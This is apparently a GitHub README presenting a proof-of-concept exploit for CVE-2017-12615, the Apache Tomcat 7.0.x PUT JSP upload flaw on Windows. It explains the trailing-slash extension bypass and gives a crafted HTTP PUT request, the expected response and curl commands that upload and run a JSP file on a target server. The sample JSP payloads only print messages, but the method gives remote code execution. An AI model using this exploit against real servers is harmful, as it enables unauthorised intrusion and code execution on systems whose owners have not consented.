Skip to content
Switch branches/tags
Go to file


Failed to load latest commit information.
Latest commit message
Commit time

In memory of Chia Junyuan (

POC CVE-2017-12615

POC Exploit for Apache Tomcat 7.0.0 to 7.0.79 running on Windows; CVE-2017-12615 PUT JSP vulnerability.


By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. But seriously, special? Please.

Exploit method:

By appending a '/' character behind the filename's extension, one can bypass the file extension check. That's it. So, not that special actually.

Exploit in a Request Method:


PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Expected response if successful

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit using 'curl':

  1. Create a .jsp file (e.g. test.jsp):
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Perform the curl command on target server:
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Check if your file is uploaded by browsing to the target address or:
curl http://target-host-or-ip-address:port/test.jsp


POC Exploit for Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP vulnerability.



No releases published


No packages published